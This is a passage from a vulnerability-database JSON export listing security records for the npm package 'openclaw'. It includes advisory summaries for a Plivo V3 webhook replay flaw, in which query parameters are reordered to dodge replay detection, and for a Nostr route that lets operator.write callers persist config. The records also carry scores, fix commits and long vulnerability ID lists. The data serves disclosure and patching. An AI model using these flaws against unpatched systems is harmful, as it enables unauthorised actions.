/github.com/advisories/GHSA-vqvg-86cc-cg83"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":
"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":
"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":
"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":
"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["GHSA-vqvg-86cc-cg83"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCI
D-bumq-54sb-6ua7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91130?format=json","vulnerability_id":"VCID-bzw7-yvu2-yqa2","summary":"OpenClaw: Voice-call Plivo V3 webhook replay key uses unsorted URL, allowing replay via query-parameter reordering\n## Summary\n\nPlivo V3 signature verification canonicalized query ordering, but replay detection hashed the raw verification URL. Reordering query parameters preserved a valid signature while producing a fresh replay-cache key.\n\n## Impact\n\nAn attacker who captured one valid signed Plivo V3 webhook could replay the same event by permuting query parameters and trigger duplicate voice-call processing.\n\n## Affected Component\n\n`extensions/voice-call/src/webhook-security.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `85777e726c` (`Voice Call: canonicalize Plivo V3 replay key`).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41395","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05113","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05091","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.05098","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41395"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/85777e726cb02c01a911b3ff832ddf4d664d5c94","reference_id":"","reference_type":"","scores
":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/85777e726cb02c01a911b3ff832ddf4d664d5c94"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8689-gm9g-jgr6","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:20:49Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8689-gm9g-jgr6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41395","reference_id":"CVE-2026-41395","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41395"},{"reference_url":"https://github.com/advisories/GHSA-8689-gm9g-jgr6","reference_id":"GHSA-8689-gm9g-jgr6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8689-gm9g-jgr6"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-webhook-replay-via-query-parameter-reordering-in-plivo-v3","reference_id":"openclaw-webhook-replay-via-query-parameter-reordering-in-plivo-v3","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc",
"scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:20:49Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-webhook-replay-via-query-parameter-reordering-in-plivo-v3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2w
x-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8x
d-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2
w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41395","GHSA-8689-gm9g-jgr6"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bzw7-yvu2-yqa2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89505?format=json","vulnerability_id":"VCID-c25h-khws-2fc3","summary":"OpenClaw: Nostr profile mutation routes allowed operator.write config persistence\n## Summary\n\nNostr profile mutation routes allowed operator.write config persistence.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nNostr plugin HTTP profile routes could persist profile config through a path that did not require admin authority: a caller holding only `operator.write` scope could make the change.\n\n## Technical Details\n\nThe fix requires `operator.admin` scope for Nostr profile mutation routes.\n\n## Fix\n\nThe issue was fixed in #63553. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `6517c700de9bb0ee11b41ab625ef3b63d01b6083`\n- PR: #63553\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. 
The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zpbrent and @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/pull/63553","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/63553"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f3h5-h452-vp3j","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f3h5-h452-vp3j"},{"reference_url":"https://github.com/advisories/GHSA-f3h5-h452-vp3j","reference_id":"GHSA-f3h5-h452-vp3j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f3h5-h452-vp3j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"V
CID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br